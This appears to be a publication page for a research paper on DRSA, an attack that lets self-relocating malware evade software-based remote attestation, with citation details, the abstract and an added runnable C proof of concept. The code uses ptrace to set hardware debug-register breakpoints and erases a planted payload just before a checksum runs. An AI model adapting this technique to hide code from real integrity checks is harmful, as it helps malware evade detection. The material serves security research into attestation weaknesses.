
Research Article
DRSA: Debug Register-Based Self-relocating Attack Against Software-Based Remote Authentication
@INPROCEEDINGS{10.1007/978-3-031-60037-1_2,
  author = {Zheng Zhang and Jingfeng Xue and Tianshi Mu and Ting Yu and Kefan Qiu and Tian Chen and Yuanzhang Li},
  title = {DRSA: Debug Register-Based Self-relocating Attack Against Software-Based Remote Authentication},
  proceedings = {Blockchain Technology and Emerging Applications. Third EAI International Conference, BlockTEA 2023, Wuhan, China, December 2-3, 2023, Proceedings},
  proceedings_a = {BLOCKTEA},
  year = {2024},
  month = {5},
  keywords = {Remote attestation, Debug registers, Self-relocating malware},
  doi = {10.1007/978-3-031-60037-1_2}
}
- Zheng Zhang
- Jingfeng Xue
- Tianshi Mu
- Ting Yu
- Kefan Qiu
- Tian Chen
- Yuanzhang Li
Year: 2024
BLOCKTEA
Springer
DOI: 10.1007/978-3-031-60037-1_2
Abstract
Remote attestation (RA) is an essential feature of many security protocols for verifying the memory integrity of remote embedded (IoT) devices. Several RA techniques verify the remote device binary at the moment a checksum function is executed over a specific memory region. A self-relocating malware may move itself to avoid being "caught" by the checksum function, because the attestation provides no information about the device binary before the current checksum execution or between consecutive checksum executions. Several software-based approaches, which lack dedicated hardware support, rely on detecting the extra latency incurred by the malware's relocation by imposing tight time constraints on the checksum. In this paper, we demonstrate the shortcomings of existing software-based approaches by presenting the Debug Register-based Self-relocating Attack (DRSA). DRSA monitors the execution of the checksum function using the debug registers and erases itself before the next attestation. Our evaluation demonstrates that DRSA incurs low overhead and is extremely difficult for the verifier to detect.
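As an added illustration of the mechanism the abstract describes (constructed for this page; it is not the authors' code and is not taken from the paper): on x86-64 Linux a tracer process programs the prover's debug registers through ptrace, placing a hardware execution breakpoint (DR0 = entry address of the checksum function, DR7 bit 0 set) on the checksum function. When the breakpoint fires, the tracer zeroes a planted payload in the attested region before a single checksum instruction has run, so the checksum equals the clean value. Assumptions: Linux x86-64 with ptrace permitted between parent and child; the 64-byte region, the FNV-1a checksum standing in for the attestation checksum, the payload bytes and the tracer process are all constructed here. On the embedded targets the paper considers, the malware would write the debug registers itself; user space on Linux cannot, so the tracer stands in for that step.

```c
/* Added illustration of a debug-register hook on a checksum function
 * (constructed for this page; not the paper's code).
 * Assumes Linux x86-64 with ptrace permitted between parent and child. */
#define _GNU_SOURCE
#include <signal.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

#define REGION_LEN 64

/* Memory region the verifier attests; its clean state is all zeros. */
static volatile uint8_t region[REGION_LEN];
/* Constructed "malware" bytes the attacker plants in the region. */
static const uint8_t payload[] = "DRSA-PAYLOAD";

/* Stand-in for the attestation checksum (FNV-1a over the region).
 * noinline keeps a stable entry address for the hardware breakpoint. */
__attribute__((noinline))
uint32_t checksum(const volatile uint8_t *p, size_t n) {
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < n; i++) { h ^= p[i]; h *= 16777619u; }
    return h;
}

/* Value the verifier expects for an uninfected region. */
uint32_t clean_checksum(void) {
    uint8_t zeros[REGION_LEN] = {0};
    return checksum(zeros, REGION_LEN);
}

/* Tracer side: load DR0 with the checksum entry address and enable it in DR7
 * (bit 0 = L0; R/W0 = LEN0 = 00 selects an execution breakpoint). When the
 * prover traps at checksum entry, zero the payload in its memory, disarm the
 * breakpoint and let the checksum run over a clean region. The tracer stands
 * in for the malware's own debug-register writes (assumption for Linux). */
static int monitor(pid_t pid) {
    int st;
    const unsigned long dr0 = offsetof(struct user, u_debugreg[0]);
    const unsigned long dr7 = offsetof(struct user, u_debugreg[7]);
    if (waitpid(pid, &st, 0) < 0 || !WIFSTOPPED(st)) return -1;        /* prover at SIGSTOP */
    if (ptrace(PTRACE_POKEUSER, pid, dr0, (void *)(uintptr_t)checksum) < 0) return -1;
    if (ptrace(PTRACE_POKEUSER, pid, dr7, (void *)1UL) < 0) return -1;
    if (ptrace(PTRACE_CONT, pid, 0, 0) < 0) return -1;
    if (waitpid(pid, &st, 0) < 0 || !WIFSTOPPED(st) || WSTOPSIG(st) != SIGTRAP) return -1;
    for (size_t off = 0; off < REGION_LEN; off += sizeof(long))         /* erase payload */
        if (ptrace(PTRACE_POKEDATA, pid, (void *)((uintptr_t)region + off), (void *)0UL) < 0) return -1;
    if (ptrace(PTRACE_POKEUSER, pid, dr7, (void *)0UL) < 0) return -1;  /* disarm */
    if (ptrace(PTRACE_CONT, pid, 0, 0) < 0) return -1;
    if (waitpid(pid, &st, 0) < 0 || !WIFEXITED(st)) return -1;
    return WEXITSTATUS(st);
}

/* Runs one attestation round in a forked prover. Returns 1 if the checksum
 * differs from the clean value (payload detected), 0 if it matches, -1 on error. */
int attest(int use_drsa) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Call through a volatile pointer so the real symbol, not a clone, is entered. */
        uint32_t (*volatile chk)(const volatile uint8_t *, size_t) = checksum;
        memcpy((void *)region, payload, sizeof payload);                /* infect */
        if (use_drsa) {
            if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) _exit(3);
            raise(SIGSTOP);                 /* let the tracer arm the breakpoint */
        }
        uint32_t c = chk(region, REGION_LEN);
        _exit(c == clean_checksum() ? 0 : 1);
    }
    if (!use_drsa) {
        int st;
        if (waitpid(pid, &st, 0) < 0 || !WIFEXITED(st)) return -1;
        return WEXITSTATUS(st);
    }
    return monitor(pid);
}

int main(void) {
    printf("no hook  : payload %s\n", attest(0) == 1 ? "detected" : "missed");
    printf("DRSA hook: payload %s\n", attest(1) == 0 ? "missed" : "detected");
    return 0;
}
```

The erase happens at the trap on the checksum's first instruction, before the measured window opens, which is why a verifier that only bounds the checksum's execution time sees nothing unusual: the relocation cost is paid outside the interval it times.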